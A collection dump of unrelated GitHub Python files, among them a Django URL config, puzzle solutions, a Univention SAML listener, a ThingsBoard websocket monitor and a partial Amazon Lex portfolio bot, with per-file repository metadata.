Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom feeds import views\n\n#from . import views\nurlpatterns = [\n path(\"\",views.ApiRoot.as_view()),\n path('admin/', admin.site.urls),\n path('users/',views.UserList.as_view(),name=views.UserList.name),\n path('users//',views.UserDetail.as_view(),name=views.UserDetail.name),\n path('profiles/',views.ListProfileModel.as_view(),name=views.ListProfileModel.name),\n path('profiles//',views.ListProfileModelDetail.as_view(),name=views.ListProfileModelDetail.name),\n\n path('comments/',views.ListPostCommentModel.as_view(),name=views.ListPostCommentModel.name),\n path('comments/',views.ListPostCommentModelDetail.as_view(),name=views.ListPostCommentModelDetail.name),\n\n path('profiles-post/',views.ListProfilePostsModel.as_view(),name=views.ListProfilePostsModel.name),\n path('profiles-post//',views.ListProfilePostsModelDetail.as_view(),name=views.ListProfilePostsModelDetail.name),\n path('api-token-auth2/',views.CustomAuthToken.as_view()),\n path('api-auth/', include('rest_framework.urls')),\n]\n","repo_name":"Guilherme2020/web-api-drf-03","sub_path":"feedit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"4241226765","text":"import board\nimport json\n\ncb = board.create_board()\nwith open(\"default.json\") as pos:\n positions = json.loads(pos.read())\nvalue = board.fill_board(cb, positions)\n\ngs = cb\n\nc_castle = {'W':{'l':'','s':''},'B':{'l':'','s':''}}\n# w_castle = {'l':'','s':''} value of long and short castle can be 'm' for moved or empty\n# when you move the rook with 0 x coord long castle's value will be 'm',\n# when you move the rook with 7 x coord short castle's vlaue will be 'm'\n# and when you move the king both of the values will be 'm' ","repo_name":"Aayush4527f/chess_py","sub_path":"gs.py","file_name":"gs.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"32202897232","text":"\nfrom collections import Counter\nfrom timeit import default_timer as timer\n\n\"\"\"\nInput handling, take in and sort\n\n\"\"\"\n\ndef sortTimestamps(eventList):\n eventList.sort(key = lambda x: x.split(\"]\")[0])\n return eventList\n\ndef getInput(inputFile):\n allEvents = list()\n for line in open(inputFile):\n allEvents.append(line)\n return sortTimestamps(allEvents)\n\nclass Factory:\n\n def __init__(self):\n self.guards = dict()\n\n def getGuards(self):\n return self.guards\n\n def addGuard(self,ID):\n self.guards[ID] = Guard(ID)\n\n def getGuard(self,ID):\n return self.guards[ID]\n\n\n #for ID of most sleepy guard\n def mostSleep(self):\n mostSleep = (0,0)\n for guard in self.getGuards():\n amountOfSleep = self.guards[guard].fetchSleep()\n if amountOfSleep > mostSleep[1]:\n mostSleep = (guard, self.guards[guard].fetchSleep())\n return mostSleep[0]\n\n def hasGuard(self,ID):\n if ID in self.guards:\n return True\n else:\n return False\n\n\nclass Guard:\n\n def __init__(self,ID):\n self.ID = ID\n self.totalSleep = 0\n self.sleepTimes = list()\n\n def addSleep(self,amount):\n self.totalSleep += amount\n\n def fetchSleep(self):\n return self.totalSleep\n\n def getID(self):\n return self.ID\n\n def fallAsleep(self,minute):\n self.lastTimeOfSleep = minute\n\n def wakeUp(self,minute):\n self.lastTimeOfWake = minute\n self.addSleep(self.lastTimeOfWake-self.lastTimeOfSleep)\n for time in range (self.lastTimeOfSleep,self.lastTimeOfWake):\n self.sleepTimes.append(time)\n\n def mostFrequentMinute(self):\n cnt = Counter(self.sleepTimes)\n return cnt.most_common(1)\n\ndef newShiftID(line):\n splitLine = line.split(\" \")\n if splitLine[2] == \"Guard\":\n ID = splitLine[3][1:]\n return ID\n else:\n return None\n\ndef sleepEvent(line):\n if line.split(\" \")[2] == \"falls\":\n return True\n else:\n return False\n\ndef wakeEvent(line):\n if line.split(\" \")[2] == \"wakes\":\n return True\n else:\n return False\n\ndef getTime(line):\n return int(line.split(\" \")[1][:5].split(\":\")[1])\n\n\n#PART 1\nstart = timer()\neventList = getInput(\"input.txt\")\nfactory = Factory()\ncurrentID = None\nfor line in eventList:\n newGuardID = newShiftID(line)\n if newGuardID != None and not factory.hasGuard(newGuardID):\n #print(\"new guard begins shift!\",newGuardID)\n currentID = newGuardID\n factory.addGuard(newGuardID)\n elif newGuardID != None and factory.hasGuard(newGuardID):\n currentID = newGuardID\n elif sleepEvent(line):\n #print(\"fell asleep!\")\n time = getTime(line)\n factory.getGuard(currentID).fallAsleep(time)\n elif wakeEvent(line):\n #print(\"woke up!\")\n time = getTime(line)\n factory.getGuard(currentID).wakeUp(time)\n\n\nprint(\"---------PART 1 RESULTS----------\")\nmostSleepyGuard = factory.getGuard(factory.mostSleep())\nmostFreqMinute = mostSleepyGuard.mostFrequentMinute()[0][0]\namount = mostSleepyGuard.fetchSleep()\nprint(\"Guard\", factory.mostSleep(),\"slept the most, with a total of\", amount, \"minutes, and spends most time asleep on 00:\" + str(mostFreqMinute))\nprint(\"---------------------------------\")\n\n#PART 2\nmostSleepOnSameMinute = (0,0)\nmostSleepyGuard = 0\nfor guard in factory.getGuards():\n mostFreq = factory.getGuard(guard).mostFrequentMinute()\n if mostFreq == []:\n continue\n sleepsOn = mostFreq[0][0]\n amount = mostFreq[0][1]\n\n if amount > mostSleepOnSameMinute[1]:\n mostSleepOnSameMinute = (sleepsOn,amount)\n mostSleepyGuard = guard\n\nprint(\"--------PART 2 RESULTS----------\")\nprint(\"Guard\",mostSleepyGuard,\"slept on\",mostSleepOnSameMinute[0], mostSleepOnSameMinute[1], \"times\")\nprint(\"--------------------------------\")\nend = timer()\nprint(\"computation time:\",end-start)\n","repo_name":"hnytun/advent-of-code","sub_path":"december-4/sleepyGuards.py","file_name":"sleepyGuards.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"40459741937","text":"n = int(input())\n\n\nfor i in range(n):\n m = int(input())\n r = int(input())\n\n g = [[] for _ in range(m)]\n for _ in range(r):\n x, y = map(int, input().split())\n g[x].append(y)\n g[y].append(x)\n \n vis = [False]*m\n def dfs(x):\n vis[x] = True\n for adj in g[x]:\n if not vis[adj]:\n dfs(adj)\n \n ans = -1\n for i in range(m):\n if not vis[i]:\n dfs(i)\n ans += 1\n print(ans)","repo_name":"allEyezOnCode/algo-training","sub_path":"kattis/reachableroads.py","file_name":"reachableroads.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28377469748","text":"data = open('matrix.txt', 'r')\nresult = []\nfor i in data:\n result.append(list(map(int,i.rstrip().split(','))))\nprint(result)\n\nroute_list = {}\nfor i1,v1 in enumerate(result):\n for i2,v2 in enumerate(v1):\n if i1 !=79 and i2!=79:\n route_list[v2]= [result[i1+1][i2],result[i1][i2+1]]\n elif i1 ==79 and i2!=79:\n route_list[v2] = [result[i1][i2 + 1]]\n elif i1 !=79 and i2==79:\n route_list[v2] = [result[i1+1][i2]]\n\ncnt=0\ndef Jot(x_cor,y_cor,sum,cnt):\n if x_cor==79 and y_cor==79:\n return sum\n elif x_cor==79 and y_cor!=79:\n sum+=result[x_cor][y_cor+1]\n return Jot(x_cor,y_cor+1,sum,cnt)\n elif x_cor!=79 and y_cor==79:\n sum+=result[x_cor+1][y_cor]\n return Jot(x_cor+1,y_cor,sum,cnt)\n else:\n sum1 = sum+result[x_cor+1][y_cor]\n sum2 = sum+result[x_cor][y_cor+1]\n return min(Jot(x_cor+1,y_cor,sum1,cnt),Jot(x_cor,y_cor+1,sum2,cnt))\n\nprint(Jot(0,0,0,cnt))","repo_name":"smy37/Project-Euler","sub_path":"problem81.py","file_name":"problem81.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"19863092421","text":"from __future__ import absolute_import, annotations\n\nimport os.path\nimport subprocess\nfrom typing import Dict, List\n\nfrom univention.config_registry import ConfigRegistry, handler_set, handler_unset\n\nimport listener\n\n\ndescription = 'Manage ucs/server/saml-idp-server/* variables'\nfilter = '(|(objectClass=univentionDomainController)(objectClass=univentionMemberServer))'\nattributes = ['univentionService']\n\n\ndef handler(dn: str, new: Dict[str, List[bytes]], old: Dict[str, List[bytes]]) -> None:\n ucr = ConfigRegistry()\n ucr.load()\n listener.setuid(0)\n try:\n try:\n fqdn = '%s.%s' % (new['cn'][0].decode('UTF-8'), new['associatedDomain'][0].decode('ASCII'))\n except (KeyError, IndexError):\n return\n\n change = False\n if b'univention-saml' in new.get('univentionService', []):\n handler_set(['ucs/server/saml-idp-server/%s=%s' % (fqdn, fqdn)])\n change = True\n elif b'univention-saml' in old.get('univentionService', []):\n handler_unset(['ucs/server/saml-idp-server/%s' % (fqdn,)])\n change = True\n\n if change:\n path_to_cert = ucr.get('saml/idp/certificate/certificate')\n path_to_key = ucr.get('saml/idp/certificate/privatekey')\n if path_to_cert and os.path.exists(path_to_cert) and path_to_key and os.path.exists(path_to_key):\n subprocess.call(['systemctl', 'restart', 'univention-saml'])\n finally:\n listener.unsetuid()\n","repo_name":"univention/univention-corporate-server","sub_path":"saml/univention-saml/listener/univention-saml-servers.py","file_name":"univention-saml-servers.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"33"} +{"seq_id":"14389927051","text":"from cffi import FFI\nffi = FFI()\nffi.cdef(open('cffi-ecere.h').read()) \nffi.set_source(\"_pyecere\",\n '#include \"ecere.h\"',\n sources = [ \"../c/eC.c\", \"../c/ecere.c\" ],\n include_dirs = [\"../c\"],\n libraries = [\"ecere\"],\n library_dirs = [\"C:/Program Files/Ecere SDK/bin\"])\nif __name__ == \"__main__\":\n ffi.compile(verbose=True)\n","repo_name":"redj/prototype-bindings-ecere-sdk","sub_path":"py/build_ecere.py","file_name":"build_ecere.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71445751773","text":"# El usuario ingresa el primer número\r\nnumero1 = int(input(\"Por favor ingrese un numero: \"))\r\n# El usuario ingresa el segundo número\r\nnumero2 = int(input(\"Por favor ingrese un numero: \"))\r\n\r\n# Define una función llamada 'espejo' que toma dos argumentos: n y m\r\ndef espejo(k,x): \r\n # Asigna el valor de 'numero1' a la variable 'k'\r\n k = numero1\r\n # Inicializa una cadena vacía llamada 'espejo'\r\n espejo = \"\"\r\n # Ejecuta el bucle mientras 'k' sea mayor que 0\r\n while(k>0):\r\n # Obtiene el último dígito de 'k' y lo asigna a la variable 'dig'\r\n dig = k%10\r\n # Elimina el último dígito de 'k' y lo asigna a la variable 'sig'\r\n sig = k//10\r\n # Convierte el dígito obtenido en cadena y lo asigna a la variable 'x'\r\n x = str(dig)\r\n # Agrega el dígito como cadena al final de la cadena 'espejo'\r\n espejo+=x\r\n # Actualiza el valor de 'k' con el valor de 'sig'\r\n k = sig\r\n # Compara si la cadena 'espejo' es igual a la representación en cadena de 'numero2'\r\n if(espejo == str(numero2)):\r\n # Si son iguales, imprime que los números son espejo entre sí\r\n print(f\"El número {numero1} y el número {numero2} son números espejo entre sí\")\r\n else:\r\n # Si no son iguales, imprime que los números no son espejo entre sí\r\n print(f\"El número {numero1} y el número {numero2} no son números espejo entre sí\")\r\n\r\n# Llama a la función 'espejo' con los valores de 'numero1' y 'numero2'\r\nespejo(numero1,numero2)\r\n","repo_name":"MAFED05/Taller-2","sub_path":"punto3.py","file_name":"punto3.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"2569658082","text":"import zipfile\r\nfrom celery import shared_task\r\nfrom django.core.files.base import ContentFile\r\nfrom dataset.models import DatasetFile, ProcessedDataset, AnnotationFile\r\n\r\n\r\ndef create_subsets(lst, proportions):\r\n if len(proportions) != 2:\r\n return None\r\n\r\n total_proportions = round(sum(proportions), 2)\r\n if total_proportions != 1:\r\n return None\r\n\r\n total_elements = len(lst)\r\n num_of_subsets = len(proportions)\r\n num_elements_per_part = [int(p * total_elements / total_proportions) for p in proportions]\r\n\r\n remaining_elements = total_elements - sum(num_elements_per_part)\r\n for i in range(remaining_elements):\r\n num_elements_per_part[i % num_of_subsets] += 1\r\n\r\n subsets = []\r\n start = 0\r\n for num_elements in num_elements_per_part:\r\n end = start + num_elements\r\n subsets.append(lst[start:end])\r\n start = end\r\n\r\n return subsets\r\n\r\n@shared_task\r\ndef preprocess_zip_file(files, proportions, data_folders, raw_dataset):\r\n\r\n processedDatasets = []\r\n parent_folder_name = raw_dataset.parent_folder.folder_name\r\n \r\n imagesSubFolders = data_folders[0].folders.all().order_by('folder_name')\r\n labelsSubFolders = data_folders[1].folders.all().order_by('folder_name')\r\n\r\n with zipfile.ZipFile(files[0], 'r') as z:\r\n\r\n subsets = create_subsets(z.namelist(), proportions)\r\n for i, subset in enumerate(subsets):\r\n datasetFileInstances = []\r\n processedDataset = ProcessedDataset(\r\n name=parent_folder_name + \" \" + imagesSubFolders[i].folder_name,\r\n subset=imagesSubFolders[i].folder_name,\r\n sample_counts=len(subset),\r\n raw_dataset=raw_dataset\r\n )\r\n processedDataset.save()\r\n processedDatasets.append(processedDataset)\r\n for name in subset:\r\n content = z.read(name)\r\n content_file = ContentFile(content, name=name)\r\n \r\n datasetFile = DatasetFile(\r\n processed_dataset=processedDataset,\r\n file_name=name,\r\n file_extension=name.split('.')[-1],\r\n file_path=imagesSubFolders[i].folder_path + \"/\" + name,\r\n file_size=content_file.size,\r\n file_upload=content_file,\r\n parent=imagesSubFolders[i]\r\n )\r\n datasetFileInstances.append(datasetFile)\r\n\r\n DatasetFile.objects.bulk_create(datasetFileInstances)\r\n\r\n\r\n with zipfile.ZipFile(files[1], 'r') as z:\r\n\r\n subsets = create_subsets(z.namelist(), proportions)\r\n for i, subset in enumerate(subsets):\r\n annotationFileInstances = []\r\n for name in subset:\r\n content = z.read(name)\r\n content_file = ContentFile(content, name=name)\r\n \r\n annotationFile = AnnotationFile(\r\n processed_dataset=processedDatasets[i],\r\n file_name=name,\r\n file_extension=name.split('.')[-1],\r\n file_path=labelsSubFolders[i].folder_path + \"/\" + name,\r\n file_size=content_file.size,\r\n file_upload=content_file,\r\n parent=labelsSubFolders[i]\r\n )\r\n annotationFileInstances.append(annotationFile)\r\n\r\n AnnotationFile.objects.bulk_create(annotationFileInstances)\r\n\r\n","repo_name":"snowdenHM/aiEngine","sub_path":"dataset/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"36379539085","text":"# Notify upon problems with plants\n\nimport appdaemon.plugins.hass.hassapi as hass\nimport datetime\nimport time\n\n\nclass Test(hass.Hass):\n\n def initialize(self):\n\n self.listen_event(self.receive_telegram_callback, 'telegram_callback')\n\n def receive_telegram_callback(self, event_id, payload_event, *args):\n\n data_callback = payload_event['data']\n callback_id = payload_event['id']\n message_id = payload_event['message_id']\n chat_id = payload_event['user_id']\n\n self.log(payload_event)\n\n if payload_event['data'] == '/removekeyboard':\n\n self.call_service(\n 'telegram_bot/answer_callback_query',\n message='OK',\n callback_query_id=callback_id\n )\n\n self.call_service(\n 'telegram_bot.edit_replymarkup',\n message_id=message_id,\n chat_id=user_id,\n inline_keyboard=[]\n )\n","repo_name":"deeenclave/Home_Assistant","sub_path":"appdaemon/apps/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"27384378240","text":"import time\nimport os\nfrom queue import Queue\nfrom typing import Dict, Tuple\nimport threading\nimport json\n\nimport websocket\nimport requests\n\nfrom subscribe import Subscribe\nfrom utils import logger\nfrom influx_worker import WsInfluxWorker\n\nTHINGSBOARD_URL = os.getenv('THINGSBOARD_URL', 'http://localhost/api')\nTHINGSBOARD_URL_WS = os.getenv('THINGSBOARD_URL_WS', 'wss://localhost')\nTHINGSBOARD_ACCOUNT = os.getenv('THINGSBOARD_ACCOUNT', '')\nTHINGSBOARD_PASSWORD = os.getenv('THINGSBOARD_PASSWORD', '')\nGAP = 1 * 1000\nGAP_LAST = 2 * 1000\n\n\nclass TBWSClient(websocket.WebSocketApp):\n WS_REQ_NEW_CONNECT = 'ws_req_newconnect'\n\n def __init__(self, url, q_req_new_ws=Queue()):\n super().__init__(url,\n on_open=self.ws_on_open,\n on_close=self.ws_on_close,\n on_error=self.ws_on_error,\n on_message=self.ws_on_message,\n on_ping=self.on_ping,\n on_pong=self.on_pong,\n )\n '''\n ref:\n 1. https://websocket-client.readthedocs.io/en/latest/examples.html\n 2. https://github.com/websocket-client/websocket-client/blob/master/websocket/_app.py\n '''\n self.ws_subid = 0\n self.ws_subid_mapping = {}\n self.q_req_new_ws = q_req_new_ws\n self.count = 0\n self.init = False\n self.last_ts = {} # example{'sub_id1': time.time(), 'sub_id2': time.time()}\n\n def on_ping(self, ws, message):\n logger.debug(\"Got a ping! A pong reply has already been automatically sent.\")\n\n def on_pong(self, ws, message):\n logger.debug(\"Got a pong! No need to respond\")\n\n def _submit_req_new_ws(self):\n # submit to this thread owner for a new websocket client request\n # in case of token invaid, other reason\n self.q_req_new_ws.put(TBWSClient.WS_REQ_NEW_CONNECT)\n\n def ws_on_error(self, ws, error=Exception('')):\n logger.info(f'websocket error {str(error)}')\n self._submit_req_new_ws()\n\n def ws_on_close(self, ws, close_status_code=0, close_msg=''):\n logger.info('websocket connection closed')\n self._submit_req_new_ws()\n\n def ws_on_open(self, ws):\n topic = Subscribe.load_tb_ws_topic()\n logger.info('websocket connection opened')\n logger.debug(f'subscribe topic: {topic}')\n # ws.send(\"This is a ping\", websocket.ABNF.OPCODE_PING)\n ws.send(topic)\n\n def ws_on_message(self, ws, message=''):\n '''\n # telemetry sample\n {\n \"subscriptionId\":1,\n \"errorCode\":0,\n \"errorMsg\":null,\n \"data\":{\n \"batteryLevel\":[[1652170331846,\"80\"]],\n \"leakage\":[[1652170331846,\"true\"]],\n \"pulseCounter\":[[1652170331846,\"3106310\"]]\n },\n \"latestValues\":{\n \"pulseCounter\":1652170331846,\n \"leakage\":1652170331846,\n \"batteryLevel\":1652170331846\n }\n }\n '''\n ts_received = time.time() * 1000\n data = json.loads(message)\n sub_id = int(data['subscriptionId'])\n # filter by subscribe key\n (is_existed, device_id) = subscribe.check_if_subscribe_by_sub_id(sub_id)\n if is_existed is True:\n # filter and put data to worker\n worker_ws.enqueue(device_id, data, ts_received)\n # TODO log\n\n\nclass TBRestClient():\n def __init__(self, username='', password=''):\n self.username = username\n self.password = password\n self.tb_token = ''\n message, status_code = self.login()\n assert message == ''\n assert status_code == 200\n self.ws = None\n self.thread_ws = None\n\n self.q_req_new_ws = Queue()\n self.q_req_new_ws.put(TBWSClient.WS_REQ_NEW_CONNECT)\n self.t_ws_manager = threading.Thread(target=self.ws_thread_manager,\n daemon=True)\n self.t_ws_manager.start()\n\n def ws_thread_manager(self):\n q_interval = 60\n while True:\n data = self.q_req_new_ws.get()\n # receive request from ws client child, to perform single ws instance\n if data == TBWSClient.WS_REQ_NEW_CONNECT:\n if isinstance(self.ws, websocket.WebSocketApp) is True:\n self.ws.close()\n if isinstance(self.thread_ws, threading.Thread) is True:\n self.thread_ws.join()\n self.thread_ws = threading.Thread(target=self.start_ws, daemon=True)\n self.thread_ws.start()\n time.sleep(q_interval)\n\n def start_ws(self):\n message, status_code = self.login()\n assert message == ''\n assert status_code == 200\n url = f'{THINGSBOARD_URL_WS}/api/ws/plugins/telemetry?token={self.tb_token}'\n self.ws = TBWSClient(url, self.q_req_new_ws)\n self.ws.run_forever()\n\n def get_auth_headers(self) -> Dict:\n return {\n 'Accept': 'application/json',\n 'Accept-Encoding': 'gzip, deflate',\n 'X-Authorization': f'Bearer {self.tb_token}'\n }\n\n def login(self) -> Tuple[str, int]:\n # login to IOT Hub\n data = {\n 'username': self.username,\n 'password': self.password\n }\n message, status_code = '', 200\n r = requests.post(f'{THINGSBOARD_URL}/auth/login', json=data)\n status_code = r.status_code\n if status_code == 200:\n self.tb_token = r.json()['token']\n else:\n message = r.json()['message']\n return message, status_code\n return message, status_code\n\n\ndef start(tb_client):\n message, status_code = tb_client.login()\n assert message == ''\n assert status_code == 200\n while True:\n time.sleep(60)\n\n\nsubscribe = Subscribe()\nworker_ws = WsInfluxWorker(subscribe)\nworker_ws.start()\n\nif __name__ == '__main__':\n tb_client = TBRestClient(THINGSBOARD_ACCOUNT,\n THINGSBOARD_PASSWORD)\n start(tb_client)\n","repo_name":"chienfuchen32/thingsboard-latency-monitor","sub_path":"ws_ts_latency_monitor.py","file_name":"ws_ts_latency_monitor.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"788676417","text":"# Problem Statement: https://practice.geeksforgeeks.org/problems/make-matrix-beautiful-1587115620/1\n\n#User function Template for python3\n\nclass Solution:\n def findMinOpeartion(self, matrix, n):\n # Code here\n max_v = 0\n row = 0\n cur_s = 0\n for i in matrix:\n row += 1\n s = sum(i)\n max_v = max(s,max_v)\n cur_s += s\n for j in range(n):\n s = 0\n for i in range(n):\n s += matrix[i][j]\n max_v = max(s,max_v)\n ans = max_v*row - cur_s\n return ans\n\n\n#{ \n # Driver Code Starts\n\n#Initial Template for Python 3\n\nfor _ in range(int(input())):\n n = int(input())\n matrix = [list(map(int,input().split())) for _ in range(n)]\n ob = Solution()\n print(ob.findMinOpeartion(matrix, n))\n# } Driver Code Ends","repo_name":"yashitanamdeo/geeks-for-geeks","sub_path":"Medium/make_matrix_beautiful.py","file_name":"make_matrix_beautiful.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"33"} +{"seq_id":"8832814757","text":"#!/usr/bin/python\n#! -*-coding:utf-8 -*-\n\n'''\nclass MyProject:\n\tname = 'Pratice'\n\n\tdef forPratice(self):\n\t\tprint '%s,just for fun!'%self.name\n\nt = MyProject()\nprint t.name\nt.forPratice()\n'''\n\nclass Viehle:\n\tdef __init__(self,speed):\n\t\tself.speed =speed\n\n\tdef drive(self,distance):\n\t\ttime = distance/self.speed\n\t\tprint (\"速度为%.2f\"%time)\n\nclass Bike(Viehle):\n\tpass\n\nclass Car(Viehle):\n\tdef __init__(self,speed,flue):\n\t\tViehle.__init__(self,speed)\n\t\tself.flue = flue\n\n\tdef drive(self,distance):\n\t\tViehle.drive(self,distance)\n\t\ttotal = distance*self.flue\n\t\tprint (\"燃油量为%.2f\"%total)\n\nm = Bike(15)\nn = Car(100,0.01)\nm.drive(200)\nn.drive(200)\n\n","repo_name":"Vicky-hyq/pratice","sub_path":"pratice/face_to_project/pratice.py","file_name":"pratice.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"7198058722","text":"# 各桁の和を求める\ndef calc_sum_degits(n):\n sum_degit = 0\n while n > 0:\n sum_degit += n % 10\n n //= 10\n return sum_degit\n\nn, a, b = map(int, input().split())\n\nresult = 0\n\nfor i in range(1, n+1):\n if a <= calc_sum_degits(i) <= b:\n result += i\n\nprint(result)","repo_name":"o8n/competitive_programming","sub_path":"abc/83/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"24142745229","text":"from shutil import copyfile\nfrom pathlib import Path\nimport json\n\nMETA_FILE_NAME = \"metadata.json\"\nOUTPUT_FOLDER = \"./output-no-aug/\"\n\n\ndef read_json(path):\n with open(path) as f:\n return json.load(f)\n\n\ndef write_json(path, data):\n with open(path, 'w') as f:\n json.dump(data, f)\n\n\ndef get_input_path(index):\n return f\"input_{index}/\"\n\n\nNUM_OF_INPUTS = 4\n\n'''\n{\n categories: [\n {\n id: number,\n name: string,\n supercategory: string,\n }\n ],\n images: [\n {\n id: number,\n file_name: string,\n width: number,\n height: number,\n }\n ],\n annotations: [\n {\n id: number,\n image_id: number,\n category_id: number,\n bbox: [x, y, width, height],\n area: number,\n segmentation: [\n [x, y, x, y, x, y, x, y, ...],\n [x, y, x, y, x, y, x, y, ...],\n [x, y, x, y, x, y, x, y, ...],\n ],\n iscrowd: 0 or 1,\n }\n ]\n}\n'''\n\n# Prepare output\nPath(OUTPUT_FOLDER).mkdir(parents=True, exist_ok=True)\n\n# Read metadata\nmeta_data = read_json(f\"{get_input_path(0)}{META_FILE_NAME}\")\n\ncounter = 0\nfor img in meta_data[\"images\"]:\n img_name = img[\"file_name\"]\n try:\n src = f\"{get_input_path(0)}{img_name}\"\n dst = f\"{OUTPUT_FOLDER}{img_name}\"\n copyfile(src, dst)\n counter += 1\n except Exception as e:\n print(img_name)\n\ncur_img_index = counter\n\n# Combine, move forward with image_id\nfor i in range(0, NUM_OF_INPUTS):\n image_names = []\n\n input_meta_data = read_json(f\"{get_input_path(i)}{META_FILE_NAME}\")\n for img in input_meta_data[\"images\"]:\n img[\"id\"] += cur_img_index\n meta_data[\"images\"].append(img)\n image_names.append(img[\"file_name\"])\n\n for ann in input_meta_data[\"annotations\"]:\n ann[\"image_id\"] += cur_img_index\n meta_data[\"annotations\"].append(ann)\n\n for cat in input_meta_data[\"categories\"]:\n cat[\"id\"] += cur_img_index\n meta_data[\"categories\"].append(cat)\n\n cur_img_index += len(input_meta_data[\"images\"])\n\n for img_name in image_names:\n src = f\"{get_input_path(i)}{img_name}\"\n dst = f\"{OUTPUT_FOLDER}{img_name}\"\n copyfile(src, dst)\n\nprint(f\"Total images {cur_img_index}\")\nwrite_json(f\"{OUTPUT_FOLDER}{META_FILE_NAME}\", meta_data)\n","repo_name":"ptmdmusique/manicure-combine-coco","sub_path":"combine-coco.py","file_name":"combine-coco.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"27028975436","text":"### Required Libraries ###\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\n\n### Functionality Helper Functions ###\n\ndef parse_int(n):\n \"\"\"Securely converts a non-integer value to integer.\"\"\"\n try:\n return int(n)\n except ValueError:\n return float(\"nan\")\n\ndef build_validation_result(is_valid, violated_slot, message_content):\n \"\"\"Define a result message structured as Lex response.\"\"\"\n if message_content is None:\n return {\"isValid\": is_valid, \"violatedSlot\": violated_slot}\n return {\n \"isValid\": is_valid,\n \"violatedSlot\": violated_slot,\n \"message\": {\"contentType\": \"PlainText\", \"content\": message_content},\n }\n\n\n### Dialog Actions Helper Functions ###\n\ndef get_slots(intent_request):\n \"\"\"Fetch all the slots and their values from the current intent.\"\"\"\n return intent_request[\"currentIntent\"][\"slots\"]\n\ndef elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):\n \"\"\"Defines an elicit slot type response.\"\"\"\n return {\"sessionAttributes\":session_attributes,\"dialogAction\":{\"type\":\"ElicitSlot\",\"intentName\":intent_name,\"slots\":slots,\"slotToElicit\":slot_to_elicit,\"message\":message},\n }\n \n# Define delegate slot type response:\ndef delegate(session_attributes, slots):\n return {\"sessionAttributes\":session_attributes,\"dialogAction\":{\"type\":\"Delegate\",\"slots\":slots}}\n\ndef close(session_attributes, fulfillment_state, message):\n \"\"\"Defines a close slot type response.\"\"\"\n response = {\n \"sessionAttributes\":session_attributes,\n \"dialogAction\": {\n \"type\":\"Close\",\n \"fulfillmentState\":fulfillment_state,\n \"message\":message,\n },\n }\n return response\n\n### Intent Handler ###\n\ndef recommend_portfolio(intent_request):\n first_name = get_slots(intent_request)[\"firstName\"]\n age = get_slots(intent_request)[\"age\"]\n investment_amount = get_slots(intent_request)[\"investmentAmount\"]\n risk_level = get_slots(intent_request)[\"riskLevel\"]\n source = intent_request[\"invocationSource\"]\n output_session_attributes = intent_request[\"sessionAttributes\"]\n \n \"\"\"Performs dialog management and fulfillment for recommending a portfolio.\"\"\"\n if source == \"DialogCodeHook\":\n if not first_name:\n return elicit_slot(\n output_session_attributes,\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'firstName',\n {'contentType':'PlainText', 'content': 'Thank you for trusting me to help, can you please provide your name?'},\n )\n if first_name and not age:\n return elicit_slot(\n output_session_attributes,\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'age',\n {'contentType':'PlainText','content':'How old are you?'},\n )\n if (first_name and age) and (parse_int(age) <= 0) and not investment_amount:\n return elicit_slot(\n intent_request[\"sessionAttributes\"],\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'age',\n {'contentType':'PlainText','content':\"Age must be greater than 0; let's try that again. How old are you?\"},\n )\n if (first_name and age) and (parse_int(age) >= 65) and not investment_amount:\n return elicit_slot(\n intent_request[\"sessionAttributes\"],\n intent_request['currentIntent']['name'],\n intent_request['currentIntent']['slots'],\n 'age',\n {'contentType':'PlainText','content':'Sorry, the maximum age to use this service is 64. Please provide an age between 1 and 